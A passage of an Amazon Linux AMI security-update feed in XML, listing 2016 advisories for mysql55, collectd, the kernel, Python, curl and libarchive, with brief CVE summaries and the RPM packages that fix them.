arch="x86_64"><filename>Packages/mysql55-server-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55" version="5.5.51" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.51-1.11.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.51-1.11.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.51" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.51-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-739</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-739: medium priority package update for collectd</title><issued date="2016-09-01 18:00:00" /><updated date="2016-09-01 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6254:
Heap-based buffer overflow in the parse_packet function in network.c in collectd before 5.4.3 and 5.x before 5.5.2 allows remote attackers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a crafted network packet.
1360709:
CVE-2016-6254 collectd: heap overflow in the network plugin
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6254" title="" id="CVE-2016-6254" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="collectd-web" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-web-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-postgresql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-postgresql-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-gmond-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-mysql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-mysql-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-snmp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-snmp-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdcached" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdcached-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-varnish" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-varnish-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-notify_email" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-notify_email-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-apache" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-apache-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-generic-jmx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-generic-jmx-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-lvm" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-lvm-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-rrdtool" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-rrdtool-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-memcachec" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-memcachec-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-netlink" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-netlink-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-java" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-java-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-ipvs" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipvs-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-ipmi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-ipmi-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-bind" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-bind-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-debuginfo" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-debuginfo-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-email" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-email-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-dbi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dbi-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-curl_xml" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl_xml-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-nginx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-nginx-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-curl" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-curl-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-dns" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-dns-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="perl-Collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Collectd-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-iptables" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-iptables-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-amqp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/collectd-amqp-5.4.1-1.11.amzn1.x86_64.rpm</filename></package><package name="collectd-gmond" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-gmond-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-java" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-java-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-lvm" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-lvm-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-bind" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-bind-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-ipvs" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipvs-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-rrdcached" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdcached-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-generic-jmx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-generic-jmx-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-amqp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-amqp-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-memcachec" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-memcachec-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-postgresql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-postgresql-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-web" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-web-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-dbi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dbi-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-email" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-email-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-mysql" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-mysql-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-rrdtool" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-rrdtool-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-curl_xml" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl_xml-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-nginx" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-nginx-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-snmp" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-snmp-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="perl-Collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Collectd-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-curl" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-curl-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-notify_email" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-notify_email-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-debuginfo" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-debuginfo-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-ipmi" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-ipmi-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-iptables" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-iptables-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-dns" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-dns-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-varnish" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-varnish-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-apache" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-apache-5.4.1-1.11.amzn1.i686.rpm</filename></package><package name="collectd-netlink" version="5.4.1" release="1.11.amzn1" epoch="0" arch="i686"><filename>Packages/collectd-netlink-5.4.1-1.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-740</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-740: medium priority package update for kernel</title><issued date="2016-09-01 18:00:00" /><updated date="2016-09-01 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6828:
1367091:
CVE-2016-6828 kernel: Use after free in tcp_xmit_retransmit_queue
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6828" title="" id="CVE-2016-6828" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.19" release="29.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.19-29.55.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.19" release="29.55.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-4.4.19-29.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-741</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-741: medium priority package update for python34 python27 python26</title><issued date="2016-09-01 18:00:00" /><updated date="2016-09-01 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1000110:
It was discovered that the Python CGIHandler class did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a Python CGI script to an attacker-controlled proxy via a malicious HTTP request.
1357334:
CVE-2016-1000110 Python CGIHandler: sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000110" title="" id="CVE-2016-1000110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-devel-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.3-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-742</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-742: low priority package update for curl</title><issued date="2016-09-27 10:30:00" /><updated date="2016-09-27 10:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7167:
1375906:
CVE-2016-7167 curl: escape and unescape integer overflows
CVE-2016-7141:
1373229:
CVE-2016-7141 curl: Incorrect reuse of client certificates
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7141" title="" id="CVE-2016-7141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7167" title="" id="CVE-2016-7167" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.47.1-8.65.amzn1.i686.rpm</filename></package><package name="curl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.47.1-8.65.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.47.1-8.65.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.47.1-8.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-743</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-743: important priority package update for libarchive</title><issued date="2016-09-27 10:30:00" /><updated date="2016-09-27 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7166:
A vulnerability was found in libarchive. A specially crafted gzip file can cause libarchive to allocate memory without limit, eventually leading to a crash.
1347086:
CVE-2016-7166 libarchive: Denial of service using a crafted gzip file
CVE-2016-6250:
A vulnerability was found in libarchive. An attempt to create an ISO9660 volume with 2GB or 4GB filenames could cause the application to crash.
1347085:
CVE-2016-6250 libarchive: Buffer overflow when writing large iso9660 containers
CVE-2016-5844:
Undefined behavior (signed integer overflow) was discovered in libarchive, in the ISO parser. A crafted file could potentially cause denial of service.
1350280:
CVE-2016-5844 libarchive: undefined behaviour (integer overflow) in iso parser
CVE-2016-5418:
A flaw was found in the way libarchive handled hardlink archive entries of non-zero size. Combined with flaws in libarchive&#039;s file system sandboxing, this issue could cause an application using libarchive to overwrite arbitrary files with arbitrary data from the archive.
1362601:
CVE-2016-5418 libarchive: Archive Entry with type 1 (hardlink), but has a non-zero data size file overwrite
CVE-2016-4809:
A vulnerability was found in libarchive. A specially crafted cpio archive containing a symbolic link to a ridiculously large target path can cause memory allocation to fail, resulting in any attempt to view or extract the archive crashing.
1347084:
CVE-2016-4809 libarchive: Memory allocate error with symbolic links in cpio archives
CVE-2016-4302:
A vulnerability was found in libarchive&#039;s handling of RAR archives. A specially crafted RAR file can cause a heap overflow, potentially leading to code execution in the context of the application.
1348444:
CVE-2016-4302 libarchive: Heap buffer overflow in the Rar decompression functionality
CVE-2016-4300:
A vulnerability was found in libarchive&#039;s handling of 7zip data. A specially crafted 7zip file can cause a integer overflow resulting in memory corruption that can lead to code execution.
1348439:
CVE-2016-4300 libarchive: Heap buffer overflow vulnerability in the 7zip read_SubStreamsInfo
CVE-2016-1541:
A vulnerability was found in libarchive. A specially crafted zip file can provide an incorrect compressed size, which may allow an attacker to place arbitrary code on the heap and execute it in the context of the application.
1334211:
CVE-2016-1541 libarchive: zip_read_mac_metadata() heap-based buffer overflow
CVE-2015-8934:
A vulnerability was found in libarchive. A specially crafted RAR file could cause the application to read memory beyond the end of the decompression buffer.
1349229:
CVE-2015-8934 libarchive: out of bounds heap read in RAR parser
CVE-2015-8932:
Undefined behavior (invalid left shift) was discovered in libarchive, in how Compress streams are identified. This could cause certain files to be mistakenly identified as Compress archives and fail to read.
1348780:
CVE-2015-8932 libarchive: Undefined behavior / invalid shiftleft in TAR parser
CVE-2015-8931:
